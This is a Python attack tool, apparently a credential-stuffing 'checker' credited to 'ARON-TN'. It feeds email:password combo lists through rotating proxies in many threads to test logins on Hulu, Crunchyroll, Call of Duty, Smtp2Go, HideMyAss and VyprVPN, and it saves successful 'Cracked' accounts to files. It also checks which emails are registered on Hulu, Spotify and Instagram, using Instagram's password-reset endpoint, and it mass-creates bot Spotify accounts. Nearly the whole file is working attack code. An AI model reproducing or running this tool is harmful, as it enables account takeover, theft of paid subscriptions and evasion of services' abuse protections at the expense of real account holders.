#!/usr/bin/python import sys import os import requests import time import threading import random import json import string import urllib3 import hashlib from bs4 import BeautifulSoup urllib3.disable_warnings() def logo(): print(''' 888888 dP""b8 dP"Yb 8b d8 8b d8 88 88 88b 88 88 888888 Yb dP 88__ dP `" dP Yb 88b d88 88b d88 88 88 88Yb88 88 88 YbdP 88"" Yb Yb dP 88YbdP88 88YbdP88 Y8 8P 88 Y88 88 88 8P 88 YboodP YbodP 88 YY 88 88 YY 88 `YbodP' 88 Y8 88 88 dP }-------------{+} Coded By ARON-TN {+}-------------{ {!} - Note : - Proxies : http - If you have any idea for any checker Just Contact Me : - FB : facebook.com/amyr.gov.tn - Email : Aron.tn.official@gmail.com - ICQ : aron.tn - Telegram : @aron.tn {01} - Hulu Accounts CHECKER (WITH PROXIES) {02} - Hulu Emails CHECKER (WITH PROXIES) {03} - Spotify Emails CHECKER (WITH PROXIES) {04} - crunchyroll Accounts CHECKER (WITH PROXIES) {05} - Call of duty Accounts CHECKER (WITH PROXIES) {06} - Spotify Auto Accounts Creator (NO PROXIES NEEDED) {07} - Instagram Emails Valid CHECKER (WITH PROXIES) {08} - Smtp2Go Accounts CHECKER (WITH PROXIES) {09} - HMA Accounts CHECKER (NO PROXIES NEEDED) {10} - Vypr VPN Accounts CHECKER (PROXIES NEEDED) ''') def Folder(directory): if not os.path.exists(directory): os.makedirs(directory) def HuluAccounts(user,passw): while True: try: s=requests.Session() data={ "affiliate_name":"apple", "friendly_name":"mbconfigs+Iphone", "password":passw, "product_name":"iPhone7%2C2", "serial_number":"00001e854946e42b1cbf418fe7d2dcd64df0", "user_email":user, } head = { 'content-type':'application/x-www-form-urlencoded', 'user-agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Pragma':'no-cache', 'Accept':'*/*', } tt='http://%s' % (random.sample(listaprx,1)[0]) s.proxies ={'https':tt} response2 = s.post('https://auth.hulu.com/v1/device/password/authenticate',data=data,headers=head,timeout=100).json() try : response2['message'] print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Invalid Password') except: response2['device_token'] print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Cracked') f = open("ARON-TN_Cracker/Hulu/Accounts_Hits.txt", "a+") f.write('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Cracked\n') f.close() except Exception as exx: continue break def HuluEmails(user): while True: try: s=requests.Session() head={ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko", "Pragma":"no-cache", "Accept":"*/*", "Host":"signup.hulu.com", "Referer":"https://signup.hulu.com/account", } tt='http://%s' % (random.sample(listaprx,1)[0]) s.proxies ={'https':tt} response = s.post('https://signup.hulu.com/api/v2/accounts/status?email='+email,headers=head,timeout=100).json() if str(response['status'])=='existing': print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [E] Email : '+user+'\n [S] Status : Valid') f = open("ARON-TN_Cracker/Hulu/Emails_Hits.txt", "a+") f.write('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Cracked\n') f.close() elif str(response['status'])=='invalid': print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [E] Email : '+user+'\n [S] Status : Invalid') except Exception as exx: continue break def SpotEmail(email): while True: try: s=requests.Session() head={ 'Host':'spclient.wg.spotify.com', 'Accept':'*/*', 'Accept-Language':'en, en;q=0.01', 'Connection':'keep-alive', 'Accept-Encoding':'gzip, deflate, br', 'User-Agent':'Spotify/8.5.7 iOS/13.5.1 (iPhone12,8)', } tt='http://%s' % (random.sample(listaprx,1)[0]) s.proxies ={'https':tt} response = s.get('https://spclient.wg.spotify.com/signup/public/v1/account?email='+email+'&suggest=1&key=bff58e9698f40080ec4f9ad97a2f21e0&validate=1',headers=head).json() if response['status']==20: print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [E] Email : '+email+'\n [S] Status : Valid') f = open("ARON-TN_Cracker/Spotify/Emails_Hits.txt", "a+") f.write('Email : '+email+'\n') f.close() elif response['status']==1: print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [E] Email : '+email+'\n [S] Status : Invalid') except Exception as exx: continue break def crunchyrollAccounts(email,passw): while True: try: s=requests.Session() head1={ "User-Agent":"Dalvik/2.1.0 (Linux; U; Android 5.1.1; google Pixel 2 Build/LMY47I)", "Pragma":"no-cache", "Accept":"*/*", "X-Android-Application-Version-Name":"2.6.0", "X-Android-Device-Manufacturer":"Google", "X-Android-SDK":"22", "Using-Brightcove-Player":"1", "X-Android-Application-Version-Code":"457", "X-Android-Release":"5.1.1", "X-Android-Device-Product":"google Pixel 2", "X-Android-Device-Model":"google Pixel 2", "X-Android-Device-Is-GoogleTV":"0", } tt='http://%s' % (random.sample(listaprx,1)[0]) s.proxies ={'https':tt} response1=s.get('http://crunchyroll.com',headers=head1 ,verify=False).text amm=s.cookies.get_dict() head2 = { 'content-type':'application/x-www-form-urlencoded', 'X-Android-Application-Version-Name':'2.6.0', 'X-Android-Device-Manufacturer':'Google', 'X-Android-SDK':'22', 'Using-Brightcove-Player':'1', 'X-Android-Application-Version-Code':'457', 'X-Android-Release':'5.1.1', 'X-Android-Device-Product':'google Pixel 2', 'X-Android-Device-Model':'google Pixel 2', 'X-Android-Device-Is-GoogleTV':'0', 'User-Agent':'Dalvik/2.1.0 (Linux; U; Android 5.1.1; google Pixel 2 Build/LMY47I)', } data2={ 'account':email, 'password':passw, 'locale':'enUS', 'session_id':amm['session_id'], } response2=s.post('https://api.crunchyroll.com/login.2.json',data=data2,headers=head2).json() try: response2['data']['user'] print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+email+':'+passw+'\n [S] Status : Cracked') f = open("ARON-TN_Cracker/Crunchyroll/Accounts_Hits.txt", "a+") f.write('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+email+':'+passw+'\n [S] Status : Cracked\n') f.close() except: print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+email+':'+passw+'\n [S] Status : Invalid') except Exception as exx: continue break def callofduty(email,passw): while True: try: s=requests.Session() tt='http://%s' % (random.sample(listaprx,1)[0]) s.proxies ={'https':tt} head1={ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko", "Pragma":"no-cache", "Accept":"*/*" } response1=s.get('https://profile.callofduty.com/cod/login?redirectUrl=https%3A%2F%2Fwww.callofduty.com%2F',headers=head1).text soup = BeautifulSoup(response1, 'html.parser') amir=soup.find(type="hidden") csrf=str(amir).replace('','') data2={ 'username':str(email), 'remember_me':'false', 'password':str(passw), '_csrf':csrf, } head2={ "content-type":"application/x-www-form-urlencoded", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko", "Pragma":"no-cache", "Accept":"*/*" } response2=s.post('https://profile.callofduty.com/do_login?new_SiteId=cod',headers=head2,data=data2).text if 'You have entered an invalid email / password combination.' in response2: print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+email+':'+passw+'\n [S] Status : Invalid') elif 'My Call of Duty' in response2: print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+email+':'+passw+'\n [S] Status : Cracked') f = open("ARON-TN_Cracker/Cod/Accounts_Hits.txt", "a+") f.write('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+email+':'+passw+'\n [S] Status : Cracked\n') f.close() except Exception as exx: continue break def spotifyauto(): while True: try: s=requests.Session() letters = string.ascii_lowercase NAME=''.join(random.choice(letters) for i in range(4)) USR=''.join(random.choice(letters) for i in range(6)) amm='Bot'+str(USR)+'@aron.tn' passw='amir23456@' data1={ 'gender':'male', 'password':passw, 'password_repeat':passw, 'birth_month':'8', 'birth_year':'2000', 'creation_point':'client_mobile', 'email':amm, 'birth_day':'1', 'displayname':NAME, 'key':'bff58e9698f40080ec4f9ad97a2f21e0', 'platform':'iOS-ARM', 'creation_flow':'mobile_email', 'iagree':'1', } head1={ 'content-type':'application/x-www-form-urlencoded', 'Host':'spclient.wg.spotify.com', 'Content-Type':'application/x-www-form-urlencoded', 'Connection':'keep-alive', 'Accept':'*/*', 'User-Agent':'Spotify/8.5.7 iOS/13.5.1 (iPhone12,8)', 'Accept-Language':'fr, en;q=0.01', 'Content-Length':'283', 'Accept-Encoding':'gzip, deflate, br', } response1=s.post('https://spclient.wg.spotify.com/signup/public/v1/account',headers=head1,data=data1).json() if str(response1['status'])=='1': print('[----------------------------------------------]\n [A] Account : '+amm+':'+passw+'\n [S] Status : Created') f = open("ARON-TN_Cracker/Spotify/Accounts_Created.txt", "a+") f.write('[----------------------------------------------]\n [A] Account : '+amm+':'+passw+'\n [S] Status : Created\n') f.close() except Exception as exx: continue break def InstaEmail(email): while True: try: head={ "content-type":"application/x-www-form-urlencoded", "user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36", "x-csrftoken":"IoOjlJgt3Xstc4rESmEbrxfT2KmOdiry", "x-ig-app-id":"936619743392459", "x-ig-www-claim":"0", "x-instagram-ajax":"0737da2dc667", "x-requested-with":"XMLHttpRequest", "Pragma":"no-cache", "Accept":"*/*", "origin":"https://www.instagram.com", "referer":"https://www.instagram.com/accounts/password/reset/", "sec-fetch-dest":"empty", "sec-fetch-mode":"cors", "sec-fetch-site":"same-origin", } data={ 'email_or_username':str(email), 'recaptcha_challenge_field':'', } tt='http://%s' % (random.sample(listaprx,1)[0]) proxies ={'https':tt} response=requests.post('https://www.instagram.com/accounts/account_recovery_send_ajax/',headers=head,data=data,proxies=proxies).json() if response['status']=='ok': print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [E] Email : '+email+'\n [S] Status : Valid') f = open("ARON-TN_Cracker/Instagram/Emails_Hits.txt", "a+") f.write(str(email)+'\n') f.close() elif response['status']=='fail': print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [E] Email : '+email+'\n [S] Status : Invalid') except Exception as exx: continue break def smtp2go(user,passw): while True: try: client = requests.session() tt='http://%s' % (random.sample(listaprx,1)[0]) client.proxies ={'https':tt} data={ 'username':str(user), 'password':str(passw), 'remember_me_token':'', } head = { 'content-type':'application/x-www-form-urlencoded', 'Frontend-Validation':'true', 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3907.0 Safari/537.36', 'X-Requested-With':'XMLHttpRequest', } response = client.post('https://app.smtp2go.com/api/login/',headers=head,data=data,allow_redirects=False).json() if response['status'] == 'OK' : print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Cracked') f = open("ARON-TN_Cracker/Smtp2go/Accounts_Hits.txt", "a+") f.write('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Cracked\n') f.close() elif response['status'] == 'ERROR': print('[----------------------------------------------]\n [p] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Invalid') except Exception as exx: continue break def hma(user,passw): p = hashlib.md5(passw.encode('utf-8')).hexdigest() head = { 'user-agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Pragma':'no-cache', 'Accept':'*/*', } response = requests.get('https://vpn.hidemyass.com/vpncontrol/accounts/info28/'+str(user)+'/'+str(p)+'?platform=win64&ver=',headers=head,timeout=100).text if 'The username and password you entered are incorrect' in response: print('[-] '+str(user)+':'+str(passw)+' ==> Invalid') else: print('[+] '+str(user)+':'+str(passw)+' ==> Valid') f = open("ARON-TN_Cracker/Hma/Hma_Hits.txt", "a+") f.write('\n++++++++++++++++++\n'+str(response)+'\nLOGIN:'+str(user)+':'+str(passw)) f.close() def VyprVPN(email,passw): while True: try: client = requests.session() tt='http://%s' % (random.sample(listaprx,1)[0]) client.proxies ={'https':tt} head1={ "User-Agent":"okhttp/3.12.1", "username":str(user), "password":str(passw), } response = client.get('https://api.goldenfrog.com/settings',headers=head1) if 'invalid username or password' in response.text: print('[----------------------------------------------]\n [P] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Invalid') else: amir=response.json() if amir['vpn']=='null': print('[----------------------------------------------]\n [P] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Cracked\n [P] Plan : Free') f = open("ARON-TN_Cracker/VyprVPN/FreeAccounts_Hits.txt", "a+") f.write('[----------------------------------------------]\n [P] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Cracked\n [P] Plan : Free\n') f.close() else: Plan=str(amir['vpn']['account_level']) print('[----------------------------------------------]\n [P] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Cracked\n [P] Plan : '+Plan) f = open("ARON-TN_Cracker/VyprVPN/PremiumAccounts_Hits.txt", "a+") f.write('[----------------------------------------------]\n [P] Proxy : '+tt+'\n [S] Status : Valid\n [A] Account : '+user+':'+passw+'\n [S] Status : Cracked\n [P] Plan : '+Plan+'\n') f.close() except Exception as exx: continue break logo() Folder('ARON-TN_Cracker') try : menu=int(input('fcommunity ~# ')) except: sys.exit(0) if menu==1: Folder('ARON-TN_Cracker/Hulu') txt = input('[X] Combo List (email:pass) : ') filep = input('[X] Proxies List (http) : ') Threads=input('[X] Threads Number :') with open(filep) as fileprx: listaprx = fileprx.read().split('\n') random.shuffle(listaprx) with open(txt) as file: lista = file.read().split('\n') totalnum = len(lista) threadnum = int(Threads) threads = [] for i in lista: try: user,passw = i.split(':') except: continue thread = threading.Thread(target=HuluAccounts,args=(user.strip(),passw.strip())) threads.append(thread) thread.start() elif menu==2: Folder('ARON-TN_Cracker/Hulu') txt = input('[X] emails List : ') filep = input('[X] Proxies List (http) : ') Threads=input('[X] Threads Number :') with open(filep) as fileprx: listaprx = fileprx.read().split('\n') random.shuffle(listaprx) with open(txt) as file: lista = file.read().split('\n') threadnum = int(Threads) threads = [] for i in lista: thread = threading.Thread(target=HuluEmails,args=(i.strip(),)) threads.append(thread) thread.start() elif menu==3: Folder('ARON-TN_Cracker/Spotify') txt = input('[X] emails List : ') filep = input('[X] Proxies List (http) : ') Threads=input('[X] Threads Number :') with open(filep) as fileprx: listaprx = fileprx.read().split('\n') random.shuffle(listaprx) with open(txt) as file: lista = file.read().split('\n') threadnum = int(Threads) threads = [] for i in lista: thread = threading.Thread(target=SpotEmail,args=(i.strip(),)) threads.append(thread) thread.start() elif menu==4: Folder('ARON-TN_Cracker/Crunchyroll') txt = input('[X] Combo List (email:pass) : ') filep = input('[X] Proxies List (http) : ') Threads=input('[X] Threads Number :') with open(filep) as fileprx: listaprx = fileprx.read().split('\n') random.shuffle(listaprx) with open(txt) as file: lista = file.read().split('\n') threadnum = int(Threads) threads = [] for i in lista: try: user,passw = i.split(':') except: continue thread = threading.Thread(target=crunchyrollAccounts,args=(user.strip(),passw.strip())) threads.append(thread) thread.start() elif menu==5: Folder('ARON-TN_Cracker/Cod') txt = input('[X] Combo List (email:pass) : ') filep = input('[X] Proxies List (http) : ') Threads=input('[X] Threads Number :') with open(filep) as fileprx: listaprx = fileprx.read().split('\n') random.shuffle(listaprx) with open(txt) as file: lista = file.read().split('\n') threadnum = int(Threads) threads = [] for i in lista: try: user,passw = i.split(':') except: continue thread = threading.Thread(target=callofduty,args=(user.strip(),passw.strip())) threads.append(thread) thread.start() elif menu==6: Folder('ARON-TN_Cracker/Spotify') while True : spotifyauto() elif menu==7: Folder('ARON-TN_Cracker/Instagram') txt = input('[X] emails List : ') filep = input('[X] Proxies List (http) : ') Threads='1' with open(filep) as fileprx: listaprx = fileprx.read().split('\n') random.shuffle(listaprx) with open(txt) as file: lista = file.read().split('\n') threadnum = int(Threads) threads = [] for i in lista: thread = threading.Thread(target=InstaEmail,args=(i.strip(),)) threads.append(thread) thread.start() elif menu==8: Folder('ARON-TN_Cracker/Smtp2go') txt = input('[X] Combo List (email:pass) : ') filep = input('[X] Proxies List (http) : ') Threads=input('[X] Threads Number :') with open(filep) as fileprx: listaprx = fileprx.read().split('\n') random.shuffle(listaprx) with open(txt) as file: lista = file.read().split('\n') threadnum = int(Threads) threads = [] for i in lista: try: user,passw = i.split(':') except: continue thread = threading.Thread(target=smtp2go,args=(user.strip(),passw.strip())) threads.append(thread) thread.start() elif menu==9: Folder('ARON-TN_Cracker/Hma') txt = input('[X] Combo List (email:pass or user:pass) : ') Threads=input('[X] Threads Number :') with open(txt) as file: lista = file.read().split('\n') threadnum = int(Threads) threads = [] for i in lista: user,passw = i.split(':') thread = threading.Thread(target=hma,args=(user.strip(),passw.strip())) threads.append(thread) thread.start() elif menu==10: Folder('ARON-TN_Cracker/VyprVPN') txt = input('[X] Combo List (email:pass) : ') filep = input('[X] Proxies List (http) : ') Threads=input('[X] Threads Number :') with open(filep) as fileprx: listaprx = fileprx.read().split('\n') random.shuffle(listaprx) with open(txt) as file: lista = file.read().split('\n') threadnum = int(Threads) threads = [] for i in lista: try: user,passw = i.split(':') except: continue thread = threading.Thread(target=VyprVPN,args=(user.strip(),passw.strip())) threads.append(thread) thread.start()